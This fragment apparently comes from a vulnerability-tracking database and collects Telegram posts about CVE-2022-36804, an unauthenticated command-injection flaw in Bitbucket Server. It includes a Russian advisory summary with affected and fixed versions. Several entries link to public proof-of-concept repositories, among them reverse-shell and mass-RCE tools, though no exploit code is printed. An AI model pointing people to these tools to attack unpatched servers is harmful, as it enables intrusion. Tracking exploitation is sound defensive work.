"https://t.me/MrVGunz/516", "content": "CVE-2022-36804 : Atlassian Bitbucket Server and Data Center - Execute Arbitrary Code / RCE\nPOC : https://github.com/notdls/CVE-2022-36804\nVersion &amp; Description : https://nvd.nist.gov/vuln/detail/CVE-2022-36804", "creation_timestamp": "2022-10-04T10:31:00.000000Z"}, {"uuid": "264854ad-fd31-404d-b7b0-9c7e1e004f51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "exploited", "source": "https://t.me/true_secator/3346", "content": "\u034fAtlassian \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0441\u0440\u043e\u0447\u043d\u0443\u044e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u044e \u0441 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435\u043c \u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0435 Bitbucket Server and Data Center.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Atlassian, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u043c\u0435\u0435\u0442 \u043e\u0446\u0435\u043d\u043a\u0443 CVSS 9,9 \u0438\u0437 10 \u0438 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0434\u043b\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0430\u0442\u0430\u043a \u0441 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u043a\u043e\u0434\u0430.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0432 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u043a\u043e\u043d\u0435\u0447\u043d\u044b\u0445 \u0442\u043e\u0447\u043a\u0430\u0445 API Bitbucket Server \u0438 Data Center, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443, \u0438\u043c\u0435\u044e\u0449\u0435\u043c\u0443 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u043c\u0443 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044e Bitbucket \u0438\u043b\u0438 \u0441 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u044f\u043c\u0438 \u043d\u0430\u00a0\u0447\u0442\u0435\u043d\u0438\u0435\u00a0\u043a \u0447\u0430\u0441\u0442\u043d\u043e\u043c\u0443, \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c RCE, \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0432 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441.\n\nBitbucket \u2014 \u044d\u0442\u043e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0434\u043b\u044f \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430, \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u043d\u043e\u0439 \u0440\u0430\u0431\u043e\u0442\u044b \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 Git \u0441 \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0435\u0439 Jira \u0438 Trello.\n\nCVE-2022-36804 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0435 \u043f\u043e\u0441\u043b\u0435 6.10.17, \u0432\u043a\u043b\u044e\u0447\u0430\u044f 7.0.0 \u0438 \u043d\u043e\u0432\u0435\u0435, \u044d\u0442\u043e \u043e\u0437\u043d\u0430\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u0432\u0441\u0435 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u044b, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0442 \u043b\u044e\u0431\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u043e\u0442 7.0.0 \u0434\u043e 8.3.0 \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e.\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0437\u0430\u044f\u0432\u0438\u043b\u0430, \u0447\u0442\u043e \u0441\u0430\u0439\u0442\u044b Atlassian Cloud \u043d\u0435 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b \u044d\u0442\u043e\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043e\u0439.\u00a0\u00a0\n\n\u0420\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435 \u043d\u043e\u0432\u043e\u0439 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u043e\u0442 Atlassian \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043b\u043e \u0437\u0430 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0435\u0439 \u043e \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0430 \u0448\u0438\u0440\u043e\u043a\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u044b\u0439 \u043f\u0440\u043e\u0434\u0443\u043a\u0442 \u0430\u0432\u0441\u0442\u0440\u0430\u043b\u0438\u0439\u0441\u043a\u043e\u0439 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Confluence.\n\n\u041d\u043e \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0443\u0447\u0435\u0441\u0442\u044c, \u0447\u0442\u043e, \u043a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e, \u0431\u043e\u043b\u0435\u0435 \u0441\u0442\u0430\u0440\u044b\u0435 \u0438 \u043d\u0435\u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u0432\u0435\u0442\u043a\u0438 6.x \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\n\u0412\u043c\u0435\u0441\u0442\u0435 \u0441 \u0442\u0435\u043c, \u0432\u0435\u0440\u0441\u0438\u0438 7.6.17, 7.17.10, 7.21.4, 8.0.3, 8.1.3, 8.2.2 \u0438 8.3.1 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f.\n\n\u0415\u0441\u043b\u0438 \u0432\u044b \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0435 \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u043e\u0435 \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0438\u0435, \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0432 \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e feature.public.access=false.\n\n\u0418\u0441\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435, \u0432\u0435\u0434\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0448\u0438\u0439 CVE-2022-36804 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u041c\u0430\u043a\u0441 \u0413\u0430\u0440\u0440\u0435\u0442\u0442 \u043f\u043e\u043e\u0431\u0435\u0449\u0430\u043b \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c PoC \u0434\u043b\u044f \u043e\u0448\u0438\u0431\u043a\u0438 \u0447\u0435\u0440\u0435\u0437 30 \u0434\u043d\u0435\u0439, \u0447\u0442\u043e \u0432\u044b\u0437\u043e\u0432\u0435\u0442 \u0432\u0441\u043f\u043b\u0435\u0441\u043a \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u044d\u0441\u043a\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438. \n\n\u041e\u0434\u043d\u0430\u043a\u043e \u043d\u0435 \u0441\u0442\u043e\u0438\u0442 \u043f\u043e\u043b\u0430\u0433\u0430\u0442\u044c\u0441\u044f, \u0447\u0442\u043e \u044d\u0442\u043e \u043d\u0435 \u043f\u0440\u043e\u0438\u0437\u043e\u0439\u0434\u0435\u0442 \u0440\u0430\u043d\u044c\u0448\u0435.", "creation_timestamp": "2022-08-29T11:36:39.000000Z"}, {"uuid": "2b1566df-b626-4a9b-a5c6-fabe8089fb44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "https://t.me/intelexch/23632", "content": "https://github.com/Chocapikk/CVE-2022-36804-ReverseShell", "creation_timestamp": "2022-09-24T13:34:03.000000Z"}, {"uuid": "713bb5a3-9423-46e9-8a76-b2472a29eb49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2394", "content": "#CVE-2022\n\nYou can find a python script to exploit the vulnerability on Bitbucket related CVE-2022-36804.\n\nhttps://github.com/khal4n1/CVE-2022-36804\n\n@BlueRedTeam", "creation_timestamp": "2022-10-25T09:26:40.000000Z"}, {"uuid": "e2833000-f2d5-4969-8de0-8704695e4a6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/6517", "content": "Breaking Bitbucket: Pre Auth Remote Command Execution (CVE-2022-36804)\n\nhttps://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/", "creation_timestamp": "2022-09-22T12:00:29.000000Z"}, {"uuid": "89074fea-0d18-45b8-862a-8f958f81b087", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/6857", "content": "#exploit\n1. CVE-2022-20841:\nCisco RV series unauthenticated RCE laoder + mass scanner\nhttps://github.com/Zerf0X/CVE-2022-20841-RCE\n\n2. CVE-2022-36804:\nBreaking Bitbucket: Pre Auth RCE\nhttps://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server", "creation_timestamp": "2022-09-24T02:31:29.000000Z"}, {"uuid": "fa9e662f-f290-4da9-a7be-e05b258c1bb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-36804", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/6788", "content": "#exploit\n1. CVE-2022-36804:\nA critical vulnerability in Atlassian Bitbucket Server/Data Center\nhttps://github.com/CEOrbey/CVE-2022-36804-MASS-RCE\n\n2. CVE-2022-32548:\nDrayTek unauthenticated RCE vulnerability in /cgi-bin/wlogin.cgi via username field\nhttps://github.com/HarleyDoo/CVE-2022-32548-RCE-POC", "creation_timestamp": "2022-11-08T05:19:47.000000Z"}]}